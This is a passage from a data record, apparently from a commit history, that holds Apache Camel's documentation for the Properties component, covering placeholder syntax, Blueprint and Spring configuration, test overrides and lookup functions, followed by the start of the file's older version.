option\n`stopOnException` should be the value of the placeholder with the key\n\"stop\".\n\nIn our properties file we have the value defined as\n\n[source]\n----\nstop=true\n----\n\n== Using Blueprint property placeholder with Camel routes\n\nCamel supports Blueprint\nwhich also offers a property placeholder service. Camel supports\nconvention over configuration, so all you have to do is to define the\nOSGi Blueprint property placeholder in the XML file as shown below:\n\n[source,xml]\n----\n<blueprint xmlns=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns:cm=\"http:\/\/aries.apache.org\/blueprint\/xmlns\/blueprint-cm\/v1.0.0\"\n xsi:schemaLocation=\"\n http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0 https:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\/blueprint.xsd\">\n\n <!-- OSGI blueprint property placeholder -->\n <cm:property-placeholder id=\"myblueprint.placeholder\" persistent-id=\"camel.blueprint\">\n <!-- list some properties as needed -->\n <cm:default-properties>\n <cm:property name=\"result\" value=\"mock:result\"\/>\n <\/cm:default-properties>\n <\/cm:property-placeholder>\n\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <!-- in the route we can use {{ }} placeholders which will lookup in blueprint\n as Camel will auto detect the OSGi blueprint property placeholder and use it -->\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"mock:foo\"\/>\n <to uri=\"{{result}}\"\/>\n <\/route>\n <\/camelContext>\n<\/blueprint>\n----\n\n=== Using OSGi blueprint property placeholders in Camel routes\n\nBy default Camel detects and uses OSGi blueprint property placeholder\nservice. You can disable this by setting the attribute\n`useBlueprintPropertyResolver` to false on the `<camelContext>`\ndefinition.\n\n=== About placeholder syntax\n\nNotice how we can use the Camel syntax for placeholders `{{` and `}}` in the\nCamel route, which will lookup the value from OSGi blueprint.\n\nThe blueprint syntax for placeholders is `${ }`. So outside the\n`<camelContext>` you must use the `${ }` syntax. Whereas inside\n`<camelContext>` you must use `{{` and `}}` syntax.\n\nOSGi blueprint allows you to configure the syntax, so you can actually\nalign those if you want.\n\nYou can also explicit refer to a specific OSGi blueprint property\nplaceholder by its id. For that you need to use the Camel's\n`<propertyPlaceholder>` as shown in the example below:\n\n[source,xml]\n----\n<blueprint xmlns=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns:cm=\"http:\/\/aries.apache.org\/blueprint\/xmlns\/blueprint-cm\/v1.0.0\"\n xsi:schemaLocation=\"\n http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0 https:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\/blueprint.xsd\">\n\n <!-- OSGI blueprint property placeholder -->\n <cm:property-placeholder id=\"myblueprint.placeholder\" persistent-id=\"camel.blueprint\">\n <!-- list some properties as needed -->\n <cm:default-properties>\n <cm:property name=\"prefix.result\" value=\"mock:result\"\/>\n <\/cm:default-properties>\n <\/cm:property-placeholder>\n\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <!-- using Camel properties component and refer to the blueprint property placeholder by its id -->\n <propertyPlaceholder id=\"properties\" location=\"blueprint:myblueprint.placeholder\"\/>\n\n <!-- in the route we can use {{ }} placeholders which will lookup in blueprint -->\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"mock:foo\"\/>\n <to uri=\"{{prefix.result}}\"\/>\n <\/route>\n <\/camelContext>\n<\/blueprint>\n----\n\n\n== Explicit referring to a OSGi blueprint placeholder in Camel\n\nNotice how we use the `blueprint` scheme to refer to the OSGi blueprint\nplaceholder by its id. This allows you to mix and match, for example you\ncan also have additional schemes in the location. For example to load a\nfile from the classpath you can do:\n\n[source]\n----\nlocation=\"blueprint:myblueprint.placeholder,classpath:myproperties.properties\"\n----\n\nEach location is separated by comma.\n\n== Overriding Blueprint property placeholders outside CamelContext\n\nWhen using Blueprint property placeholder in the Blueprint XML file, you\ncan declare the properties directly in the XML file as shown below:\n\n[source,xml]\n----\n<!-- blueprint property placeholders -->\n<cm:property-placeholder persistent-id=\"my-placeholders\" update-strategy=\"reload\">\n <cm:default-properties>\n <cm:property name=\"greeting\" value=\"Hello\"\/>\n <cm:property name=\"destination\" value=\"mock:result\"\/>\n <\/cm:default-properties>\n<\/cm:property-placeholder>\n\n<!-- a bean that uses a blueprint property placeholder -->\n<bean id=\"myCoolBean\" class=\"org.apache.camel.test.blueprint.MyCoolBean\">\n <property name=\"say\" value=\"${greeting}\"\/>\n<\/bean>\n\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n\n <route>\n <from uri=\"direct:start\"\/>\n <bean ref=\"myCoolBean\" method=\"saySomething\"\/>\n <to uri=\"{{destination}}\"\/>\n <\/route>\n\n<\/camelContext>\n----\n\nNotice that we have a `<bean>` which refers to one of the properties. And\nin the Camel route we refer to the other using the `{{` and `}}` notation.\n\nNow if you want to override these Blueprint properties from an unit\ntest, you can do this as shown below:\n\n[source,java]\n----\nprotected String useOverridePropertiesWithConfigAdmin(Dictionary props) {\n \/\/ add the properties we want to override\n props.put(\"greeting\", \"Bye\");\n\n \/\/ return the PID of the config-admin we are using in the blueprint xml file\n return \"my-placeholders\";\n}\n----\n\nTo do this we override and implement the\n`useOverridePropertiesWithConfigAdmin` method. We can then put the\nproperties we want to override on the given props parameter. And the\nreturn value *must* be the `persistence-id` of the\n`<cm:property-placeholder>` tag, which you define in the blueprint XML\nfile.\n\n== Using .cfg or .properties file for Blueprint property placeholders\n\nWhen using Blueprint property placeholder in the Blueprint XML file, you\ncan declare the properties in a `.properties` or `.cfg` file. If you use\nApache ServieMix \/ Karaf then this container has a convention that it\nloads the properties from a file in the etc directory with the naming\n`etc\/pid.cfg`, where `pid` is the `persistence-id`.\n\nFor example in the blueprint XML file we have the\n`persistence-id=\"stuff\"`, which mean it will load the configuration file\nas `etc\/stuff.cfg`.\n\nNow if you want to unit test this blueprint XML file, then you can\noverride the `loadConfigAdminConfigurationFile` and tell Camel which\nfile to load as shown below:\n\n[source,java]\n----\n@Override\nprotected String[] loadConfigAdminConfigurationFile() {\n \/\/ String[0] = tell Camel the path of the .cfg file to use for OSGi ConfigAdmin in the blueprint XML file\n \/\/ String[1] = tell Camel the persistence-id of the cm:property-placeholder in the blueprint XML file\n return new String[]{\"src\/test\/resources\/etc\/stuff.cfg\", \"stuff\"};\n}\n----\n\nNotice that this method requires to return a `String[]` with 2 values. The\n1st value is the path for the configuration file to load.\nThe 2nd value is the `persistence-id` of the `<cm:property-placeholder>`\ntag.\n\nThe `stuff.cfg` file is just a plain properties file with the property\nplaceholders such as:\n\n[source]\n----\n== this is a comment\ngreeting=Bye\n----\n\n== Using .cfg file and overriding properties for Blueprint property placeholders\n\nYou can do both as well. Here is a complete example. First we have the\nBlueprint XML file:\n\nAnd in the unit test class we do as follows:\n\nAnd the `etc\/stuff.cfg` configuration file contains\n\n[source]\n----\ngreeting=Bye\necho=Yay\ndestination=mock:result\n----\n\n== Bridging Spring and Camel property placeholders\n\nThe Spring Framework does not allow 3rd party frameworks such as Apache\nCamel to seamless hook into the Spring property placeholder mechanism.\nHowever you can easily bridge Spring and Camel by declaring a Spring\nbean with the type\n`org.apache.camel.spring.spi.BridgePropertyPlaceholderConfigurer`, which\nis a Spring\n`org.springframework.beans.factory.config.PropertyPlaceholderConfigurer`\ntype.\n\nTo bridge Spring and Camel you must define a single bean as shown below:\n\n*Bridging Spring and Camel property placeholders*\n\nYou *must not* use the spring <context:property-placeholder> namespace\nat the same time; this is not possible.\n\nAfter declaring this bean, you can define property placeholders using\nboth the Spring style, and the Camel style within the <camelContext> tag\nas shown below:\n\n*Using bridge property placeholders*\n\nNotice how the hello bean is using pure Spring property placeholders\nusing the `${ }` notation. And in the Camel routes we use the Camel\nplaceholder notation with `{{` and `}}`.\n\n== Clashing Spring property placeholders with Camels Simple language\n\nTake notice when using Spring bridging placeholder then the spring `${ }`\nsyntax clashes with the xref:languages:simple-language.adoc[Simple] in Camel, and therefore\ntake care. For example:\n\n[source,xml]\n----\n<setHeader name=\"Exchange.FILE_NAME\">\n <simple>{{file.rootdir}}\/${in.header.CamelFileName}<\/simple>\n<\/setHeader>\n----\n\nclashes with Spring property placeholders, and you should use `$simple{ }`\nto indicate using the xref:languages:simple-language.adoc[Simple] language in Camel.\n\n[source,xml]\n----\n<setHeader name=\"Exchange.FILE_NAME\">\n <simple>{{file.rootdir}}\/$simple{in.header.CamelFileName}<\/simple>\n<\/setHeader>\n----\n\nAn alternative is to configure the `PropertyPlaceholderConfigurer` with\n`ignoreUnresolvablePlaceholders` option to `true`.\n\n== Overriding properties from Camel test kit\n\nWhen Testing with Camel and using the\nxref:properties-component.adoc[Properties] component, you may want to be able to\nprovide the properties to be used from directly within the unit test\nsource code. +\nCamel test kits, eg `CamelTestSupport` class offers the following methods\n\n* `useOverridePropertiesWithPropertiesComponent`\n* `ignoreMissingLocationWithPropertiesComponent`\n\nSo for example in your unit test classes, you can override the\n`useOverridePropertiesWithPropertiesComponent` method and return a\n`java.util.Properties` that contains the properties which should be\npreferred to be used.\n\n=== Providing properties from within unit test source\n\nThis can be done from any of the Camel Test kits, such as camel-test,\ncamel-test-spring, and camel-test-blueprint.\n\nThe `ignoreMissingLocationWithPropertiesComponent` can be used to\ninstruct Camel to ignore any locations which was not discoverable, for\nexample if you run the unit test, in an environment that does not have\naccess to the location of the properties.\n\n== Using @PropertyInject\n\nCamel allows to inject property placeholders in POJOs using the\n`@PropertyInject` annotation which can be set on fields and setter\nmethods.\n\nFor example you can use that with `RouteBuilder` classes, such as shown\nbelow:\n\n[source,java]\n----\npublic class MyRouteBuilder extends RouteBuilder {\n\n @PropertyInject(\"hello\")\n private String greeting;\n\n @Override\n public void configure() throws Exception {\n from(\"direct:start\")\n .transform().constant(greeting)\n .to(\"{{result}}\");\n }\n\n}\n----\n\nNotice we have annotated the greeting field with `@PropertyInject` and\ndefine it to use the key `\"hello\"`. Camel will then lookup the property\nwith this key and inject its value, converted to a String type.\n\nYou can also use multiple placeholders and text in the key, for example\nwe can do:\n\n[source,java]\n----\n@PropertyInject(\"Hello {{name}} how are you?\")\nprivate String greeting;\n----\n\nThis will lookup the placeholder with they key `\"name\"`.\n\nYou can also add a default value if the key does not exists, such as:\n\n[source,java]\n----\n@PropertyInject(value = \"myTimeout\", defaultValue = \"5000\")\nprivate int timeout;\n----\n\n== Using out of the box functions\n\nThe xref:properties-component.adoc[Properties] component includes the following\nfunctions out of the box\n\n* `env` - A function to lookup the property from OS environment variables\n* `sys` - A function to lookup the property from Java JVM system\nproperties\n* `service` - A function to lookup the property from OS environment\nvariables using the service naming idiom\n* `service.name` - A function to lookup the\nproperty from OS environment variables using the service naming idiom\nreturning the hostname part only\n* `service.port` - A function to lookup the\nproperty from OS environment variables using the service naming idiom\nreturning the port part only\n\nAs you can see these functions is intended to make it easy to lookup\nvalues from the environment. As they are provided out of the box, they\ncan easily be used as shown below:\n\n[source,xml]\n----\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{`{env:SOMENAME}`}\"\/>\n <to uri=\"{`{sys:MyJvmPropertyName}`}\"\/>\n <\/route>\n <\/camelContext>\n----\n\nYou can use default values as well, so if the property does not exists,\nyou can define a default value as shown below, where the default value\nis a `log:foo` and `log:bar` value.\n\n[source,xml]\n----\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{`{env:SOMENAME:log:foo}`}\"\/>\n <to uri=\"{`{sys:MyJvmPropertyName:log:bar}`}\"\/>\n <\/route>\n <\/camelContext>\n----\n\nThe service function is for looking up a service which is defined using\nOS environment variables using the service naming idiom, to refer to a\nservice location using `hostname : port`\n\n* __NAME__**_SERVICE_HOST**\n* __NAME__**_SERVICE_PORT**\n\nin other words the service uses `_SERVICE_HOST` and `_SERVICE_PORT` as\nprefix. So if the service is named FOO, then the OS environment\nvariables should be set as\n\n[source]\n----\nexport $FOO_SERVICE_HOST=myserver\nexport $FOO_SERVICE_PORT=8888\n----\n\nFor example if the FOO service a remote HTTP service, then we can refer\nto the service in the Camel endpoint uri, and use\nthe HTTP component to make the HTTP call:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"http:\/\/{`{service:FOO}`}\/myapp\"\/>\n <\/route>\n<\/camelContext>\n----\n\nAnd we can use default values if the service has not been defined, for\nexample to call a service on localhost, maybe for unit testing etc\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"http:\/\/{`{service:FOO:localhost:8080}`}\/myapp\"\/>\n <\/route>\n<\/camelContext>\n----\n\n== Using custom functions (advanced)\n\nThe xref:properties-component.adoc[Properties] component allow to plugin 3rd party\nfunctions which can be used during parsing of the property placeholders.\nThese functions are then able to do custom logic to resolve the\nplaceholders, such as looking up in databases, do custom computations,\nor whatnot. The name of the function becomes the prefix used in the\nplaceholder. This is best illustrated in the example code below\n\n[source,xml]\n----\n<bean id=\"beerFunction\" class=\"MyBeerFunction\"\/>\n\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <propertyPlaceholder id=\"properties\">\n <propertiesFunction ref=\"beerFunction\"\/>\n <\/propertyPlaceholder>\n\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{`{beer:FOO}`}\"\/>\n <to uri=\"{`{beer:BAR}`}\"\/>\n <\/route>\n<\/camelContext>\n----\n\n[NOTE]\n====\nThe location attribute (on propertyPlaceholder tag) is not mandatory\n====\n\nHere we have a Camel XML route where we have defined the\n`<propertyPlaceholder>` to use a custom function, which we refer to be the\nbean id - eg the `beerFunction`. As the beer function uses `\"beer\"` as its\nname, then the placeholder syntax can trigger the beer function by\nstarting with `beer:value`.\n\nThe implementation of the function is only two methods as shown below:\n\n[source,java]\n----\npublic static final class MyBeerFunction implements PropertiesFunction {\n\n @Override\n public String getName() {\n return \"beer\";\n }\n\n @Override\n public String apply(String remainder) {\n return \"mock:\" + remainder.toLowerCase();\n }\n}\n----\n\nThe function must implement\nthe `org.apache.camel.component.properties.PropertiesFunction`\ninterface. The method `getName` is the name of the function, eg beer.\nAnd the `apply` method is where we implement the custom logic to do. As\nthe sample code is from an unit test, it just returns a value to refer\nto a mock endpoint.\n\nTo register a custom function from Java code is as shown below:\n\n[source,java]\n----\nPropertiesComponent pc = (org.apache.camel.componennt.properties.PropertiesComponent) context.getPropertiesComponent();\npc.addFunction(new MyBeerFunction());\n----\n\n\n== Using 3rd-party properties sources\n\nThe properties component allows to plugin 3rd party sources to load and lookup properties via the `PropertySource`\nAPI from camel-api. For example the `camel-microprofile-config` component is implemented using this.\nThe 3rd-party `PropertySource` can automatic be discoverd from classpath when Camel is starting up.\nThis is done by include the file `META-INF\/services\/org\/apache\/camel\/property-source-factory` file\nwhich refers to the fully qualified class name of the `PropertySource` implementation.\nSee the `camel-microprofile-config` for an example.\n\nYou can also register 3rd-part property sources via Java API\n\n[source,java]\n----\nPropertiesComponent pc = ...\npc.addPropertySource(myPropertySource);\n----\n\n=== LoadablePropertySource\n\nA `PropertySource` can define that it supports loading all its properties from the source at once,\nfor example from file system. This allows Camel properties component to load these properties at once\nduring startup.\n\n=== PropertySource\n\nThe regular `PropertySource` will lookup the property on-demand, for example to lookup\nvalues from a backend source such as a database or HashiCorp Vault etc.\n\n\n","old_contents":"[[properties-component]]\n= Properties Component\n\/\/THIS FILE IS COPIED: EDIT THE SOURCE FILE:\n:page-source: core\/camel-base\/src\/main\/docs\/properties-component.adoc\n\/\/Written by hand, not generated.\n:docTitle: Properties\n:artifactId: camel-base\n:description: The properties component is used for property placeholders in your Camel application, such as endpoint URIs.\n:since: 2.3\n:supportLevel: Stable\n\n*Since Camel {since}*\n\nThe properties component is used for property placeholders in your Camel application, such as endpoint URIs.\nIt is *not* a regular Camel component with producer and consumer for routing messages. However for historical\nreasons it was named `PropertiesComponent` and this name is commonly known and therefore we keep using it.\n\n== Spring Boot Auto-Configuration\n\nThe component supports 10 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.properties.auto-discover-properties-sources* | Whether to automatically discovery instances of PropertiesSource from registry and service factory. | true | Boolean\n| *camel.component.properties.default-fallback-enabled* | If false, the component does not attempt to find a default for the key by looking after the colon separator. | true | Boolean\n| *camel.component.properties.encoding* | Encoding to use when loading properties file from the file system or classpath. If no encoding has been set, then the properties files is loaded using ISO-8859-1 encoding (latin-1) as documented by java.util.Properties#load(java.io.InputStream) | | String\n| *camel.component.properties.environment-variable-mode* | Sets the OS environment variables mode (0 = never, 1 = fallback, 2 = override). The default mode (override) is to use OS environment variables if present, and override any existing properties. OS environment variable mode is checked before JVM system property mode | 2 | Integer\n| *camel.component.properties.ignore-missing-location* | Whether to silently ignore if a location cannot be located, such as a properties file not found. | false | Boolean\n| *camel.component.properties.initial-properties* | Sets initial properties which will be used before any locations are resolved. The option is a java.util.Properties type. | | String\n| *camel.component.properties.location* | A list of locations to load properties. You can use comma to separate multiple locations. This option will override any default locations and only use the locations from this option. | | String\n| *camel.component.properties.override-properties* | Sets a special list of override properties that take precedence and will use first, if a property exists. The option is a java.util.Properties type. | | String\n| *camel.component.properties.properties-parser* | To use a custom PropertiesParser. The option is a org.apache.camel.component.properties.PropertiesParser type. | | String\n| *camel.component.properties.system-properties-mode* | Sets the JVM system property mode (0 = never, 1 = fallback, 2 = override). The default mode (override) is to use system properties if present, and override any existing properties. OS environment variable mode is checked before JVM system property mode | 2 | Integer\n|===\n\n[TIP]\n**Resolving property from Java code** +\nYou can use the method `resolvePropertyPlaceholders` on the\n`CamelContext` to resolve a property from any Java code.\n\n== Using PropertyPlaceholder\n\nCamel now provides a new `PropertiesComponent` in *camel-core* which\nallows you to use property placeholders when defining Camel\nEndpoint URIs.\n\nThis works much like you would do if using Spring's\n`<property-placeholder>` tag. However Spring have a limitation which\nprevents 3rd party frameworks to leverage Spring property placeholders\nto the fullest. See more at\nxref:manual:faq:how-do-i-use-spring-property-placeholder-with-camel-xml.adoc[How do\nI use Spring Property Placeholder with Camel XML].\n\n[TIP]\n**Bridging Spring and Camel property placeholders** +\nYou can bridge the Spring property placeholder\nwith Camel, see further below for more details.\n\nThe property placeholder is generally in use when doing:\n\n* lookup or creating endpoints\n* lookup of beans in the Registry\n* additional supported in Spring XML (see below in examples)\n* using Blueprint PropertyPlaceholder with Camel\nxref:properties-component.adoc[Properties] component\n* using `@PropertyInject` to inject a property in a POJO\n* Using default value if a property does not exist\n* Include out of the box functions, to lookup property\nvalues from OS environment variables, JVM system properties, or the\nservice idiom.\n* Using custom functions, which can be plugged into the\nproperty component.\n\n== Syntax\n\nThe syntax to use Camel's property placeholder is to use `{\\{key}}` for\nexample `{{file.uri}}` where `file.uri` is the property key.\n\nYou can use property placeholders in parts of the endpoint URI's which\nfor example you can use placeholders for parameters in the URIs.\n\nYou can specify a default value to use if\na property with the key does not exists, eg `file.url:\/some\/path` where\nthe default value is the text after the colon (eg \/some\/path).\n\n[NOTE]\n====\nDo not use colon in the property key. The colon is used as a separator\ntoken when you are providing a default value.\n====\n\n== Defining location\n\nThe properties component needs to know a location(s) where to resolve the\nproperties. You can define 1 to many locations. If you define the\nlocation in a single String property you can separate multiple locations\nwith comma such as:\n\n[source,java]\n----\npc.setLocation(\"com\/mycompany\/myprop.properties,com\/mycompany\/other.properties\");\n----\n\nYou can set which location can be discarded if missing by setting the ``optional`` attribute, which is false by default, i.e:\n\n[source,java]\n----\npc.setLocations(\n \"com\/mycompany\/override.properties;optional=true\"\n \"com\/mycompany\/defaults.properties\");\n----\n\n== Using system and environment variables in locations\n\nThe location now supports using placeholders for JVM system properties\nand OS environments variables.\n\nFor example:\n\n[source]\n----\nlocation=file:${karaf.home}\/etc\/foo.properties\n----\n\nIn the location above we defined a location using the file scheme using\nthe JVM system property with key `karaf.home`.\n\nTo use an OS environment variable instead you would have to prefix with\nenv:\n\n[source]\n----\nlocation=file:${env:APP_HOME}\/etc\/foo.properties\n----\n\nWhere `APP_HOME` is an OS environment.\n\n[NOTE]\n====\nSome OS'es (such as Linux) do not support dashes in environment variable names,\nso here we are using `APP_HOME`. But if you specify `APP-HOME` then Camel 3 will automatic lookup\nthe value as `APP_HOME` (with underscore) as fallback.\n====\n\nYou can have multiple placeholders in the same location, such as:\n\n[source]\n----\nlocation=file:${env:APP_HOME}\/etc\/${prop.name}.properties\n----\n\n== Configuring in Java DSL\n\nYou have to create and register the `PropertiesComponent` under the name\n`properties` such as:\n\n[source,java]\n----\nPropertiesComponent pc = camelContext.getPropertiesComponent();\npc.setLocation(\"classpath:com\/mycompany\/myprop.properties\");\n----\n\n== Configuring in Spring XML\n\nSpring XML offers two variations to configure. You can define a spring\nbean as a `PropertiesComponent` which resembles the way done in Java\nDSL. Or you can use the `<propertyPlaceholder>` tag.\n\n[source,xml]\n----\n<bean id=\"properties\" class=\"org.apache.camel.component.properties.PropertiesComponent\">\n <property name=\"location\" value=\"classpath:com\/mycompany\/myprop.properties\"\/>\n<\/bean>\n----\n\nUsing the `<propertyPlaceholder>` tag makes the configuration a bit more\nfresh such as:\n\n[source,xml]\n----\n<camelContext ...>\n <propertyPlaceholder id=\"properties\" location=\"com\/mycompany\/myprop.properties\"\/>\n<\/camelContext>\n----\n\nSetting the properties location through the location tag works just fine but sometimes you have a number of resources to take into account and starting from *Camel 2.19.0* you can set the properties location with a dedicated propertiesLocation:\n\n[source,xml]\n----\n<camelContext ...>\n <propertyPlaceholder id=\"myPropertyPlaceholder\">\n <propertiesLocation\n resolver = \"classpath\"\n path = \"com\/my\/company\/something\/my-properties-1.properties\"\n optional = \"false\"\/>\n <propertiesLocation\n resolver = \"classpath\"\n path = \"com\/my\/company\/something\/my-properties-2.properties\"\n optional = \"false\"\/>\n <propertiesLocation\n resolver = \"file\"\n path = \"${karaf.home}\/etc\/my-override.properties\"\n optional = \"true\"\/>\n <\/propertyPlaceholder>\n<\/camelContext>\n----\n\n[TIP]\n**Specifying the cache option inside XML** +\nCamel supports specifying a value for the cache option both\ninside the Spring as well as the Blueprint XML.\n\n== Using a Properties from the Registry\n\nFor example in OSGi you may want to expose a service which returns the\nproperties as a `java.util.Properties` object.\n\nThen you could setup the xref:properties-component.adoc[Properties] component as\nfollows:\n\n[source,xml]\n----\n <propertyPlaceholder id=\"properties\" location=\"ref:myProperties\"\/>\n----\n\nWhere `myProperties` is the id to use for lookup in the OSGi registry.\nNotice we use the `ref:` prefix to tell Camel that it should lookup the\nproperties for the Registry.\n\n== Examples using properties component\n\nWhen using property placeholders in the endpoint URIs you can either use\nthe `properties:` component or define the placeholders directly in the\nURI. We will show example of both cases, starting with the former.\n\n[source,java]\n----\n\/\/ properties\ncool.end=mock:result\n\n\/\/ route\nfrom(\"direct:start\").to(\"{{cool.end}}\");\n----\n\nYou can also use placeholders as a part of the endpoint uri:\n\n[source,java]\n----\n\/\/ properties\ncool.foo=result\n\n\/\/ route\nfrom(\"direct:start\").to(\"mock:{{cool.foo}}\");\n----\n\nIn the example above the to endpoint will be resolved to `mock:result`.\n\nYou can also have properties with refer to each other such as:\n\n[source,java]\n----\n\/\/ properties\ncool.foo=result\ncool.concat=mock:{{cool.foo}}\n\n\/\/ route\nfrom(\"direct:start\").to(\"mock:{{cool.concat}}\");\n----\n\nNotice how `cool.concat` refer to another property.\n\nAnd you can use placeholders several times:\n\n[source,java]\n----\n\/\/ properties\ncool.start=direct:start\ncool.showid=true\ncool.result=result\n\n\/\/ route\nfrom(\"{{cool.start}}\")\n .to(\"log:{{cool.start}}?showBodyType=false&showExchangeId={{cool.showid}}\")\n .to(\"mock:{{cool.result}}\");\n----\n\nYou can also your property placeholders when using\nProducerTemplate for example:\n\n[source,java]\n----\ntemplate.sendBody(\"{{cool.start}}\", \"Hello World\");\n----\n\n== Example with xref:languages:simple-language.adoc[Simple] language\n\nThe xref:languages:simple-language.adoc[Simple] language now also support using property\nplaceholders, for example in the route below:\n\n[source,java]\n----\n\/\/ properties\ncheese.quote=Camel rocks\n\n\/\/ route\nfrom(\"direct:start\")\n .transform().simple(\"Hi ${body} do you think ${properties:cheese.quote}?\");\n----\n\n== Additional property placeholder supported in Spring XML\n\nThe property placeholders is also supported in many of the Camel Spring\nXML tags such as\n`<package>, <packageScan>, <contextScan>, <jmxAgent>, <endpoint>, <routeBuilder>, <proxy>`\nand the others.\n\nThe example below has property placeholder in the `<jmxAgent>` tag:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <propertyPlaceholder id=\"properties\" location=\"org\/apache\/camel\/spring\/jmx.properties\"\/>\n <!-- we can use property placeholders when we define the JMX agent -->\n <jmxAgent id=\"agent\" disabled=\"{{myjmx.disabled}}\"\n usePlatformMBeanServer=\"{{myjmx.usePlatform}}\"\n statisticsLevel=\"RoutesOnly\" useHostIPAddress=\"true\"\/>\n <route id=\"foo\" autoStartup=\"false\">\n <from uri=\"seda:start\"\/>\n <to uri=\"mock:result\"\/>\n <\/route>\n<\/camelContext>\n----\n\nYou can also define property placeholders in the various attributes on\nthe `<camelContext>` tag such as `trace` as shown here:\n\n[source,xml]\n----\n<camelContext trace=\"{{foo.trace}}\" xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <propertyPlaceholder id=\"properties\" location=\"org\/apache\/camel\/spring\/processor\/myprop.properties\"\/>\n <template id=\"camelTemplate\" defaultEndpoint=\"{{foo.cool}}\"\/>\n <route>\n <from uri=\"direct:start\"\/>\n <setHeader name=\"{{foo.header}}\">\n <simple>${in.body} World!<\/simple>\n <\/setHeader>\n <to uri=\"mock:result\"\/>\n <\/route>\n<\/camelContext>\n----\n\n== Using JVM system properties or Environment variables as override or fallback values\n\nThe properties components supports using JVM system properties and also OS environment variables\nas values which can either be used as override or fallback values.\n\nThe default mode is that both of them are in override mode, and they are check in the following order:\n\n1. OS environment variable (override mode)\n2. JVM system property (override mode)\n3. Property files and other locations\n4. OS environment variable (fallback mode)\n5. JVM system property (fallback mode)\n\nThe check stops at first found property value for the key.\n\nYou can control these modes using the `systemPropertiesMode` and `environmentVariableMode`\noptions on the property's component.\n\n== Using property placeholders for any kind of attribute in the XML DSL\n\nIn the example below we use the `prop` prefix for the namespace\ncamel.apache.org\/schema\/placeholder by which we can use the\n`prop` prefix in the attributes in the XML DSLs. Notice how we use that\nin the Multicast to indicate that the option\n`stopOnException` should be the value of the placeholder with the key\n\"stop\".\n\nIn our properties file we have the value defined as\n\n[source]\n----\nstop=true\n----\n\n== Using Blueprint property placeholder with Camel routes\n\nCamel supports Blueprint\nwhich also offers a property placeholder service. Camel supports\nconvention over configuration, so all you have to do is to define the\nOSGi Blueprint property placeholder in the XML file as shown below:\n\n[source,xml]\n----\n<blueprint xmlns=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns:cm=\"http:\/\/aries.apache.org\/blueprint\/xmlns\/blueprint-cm\/v1.0.0\"\n xsi:schemaLocation=\"\n http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0 https:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\/blueprint.xsd\">\n\n <!-- OSGI blueprint property placeholder -->\n <cm:property-placeholder id=\"myblueprint.placeholder\" persistent-id=\"camel.blueprint\">\n <!-- list some properties as needed -->\n <cm:default-properties>\n <cm:property name=\"result\" value=\"mock:result\"\/>\n <\/cm:default-properties>\n <\/cm:property-placeholder>\n\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <!-- in the route we can use {{ }} placeholders which will lookup in blueprint\n as Camel will auto detect the OSGi blueprint property placeholder and use it -->\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"mock:foo\"\/>\n <to uri=\"{{result}}\"\/>\n <\/route>\n <\/camelContext>\n<\/blueprint>\n----\n\n=== Using OSGi blueprint property placeholders in Camel routes\n\nBy default Camel detects and uses OSGi blueprint property placeholder\nservice. You can disable this by setting the attribute\n`useBlueprintPropertyResolver` to false on the `<camelContext>`\ndefinition.\n\n=== About placeholder syntax\n\nNotice how we can use the Camel syntax for placeholders `{{` and `}}` in the\nCamel route, which will lookup the value from OSGi blueprint.\n\nThe blueprint syntax for placeholders is `${ }`. So outside the\n`<camelContext>` you must use the `${ }` syntax. Whereas inside\n`<camelContext>` you must use `{{` and `}}` syntax.\n\nOSGi blueprint allows you to configure the syntax, so you can actually\nalign those if you want.\n\nYou can also explicit refer to a specific OSGi blueprint property\nplaceholder by its id. For that you need to use the Camel's\n`<propertyPlaceholder>` as shown in the example below:\n\n[source,xml]\n----\n<blueprint xmlns=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns:cm=\"http:\/\/aries.apache.org\/blueprint\/xmlns\/blueprint-cm\/v1.0.0\"\n xsi:schemaLocation=\"\n http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0 https:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\/blueprint.xsd\">\n\n <!-- OSGI blueprint property placeholder -->\n <cm:property-placeholder id=\"myblueprint.placeholder\" 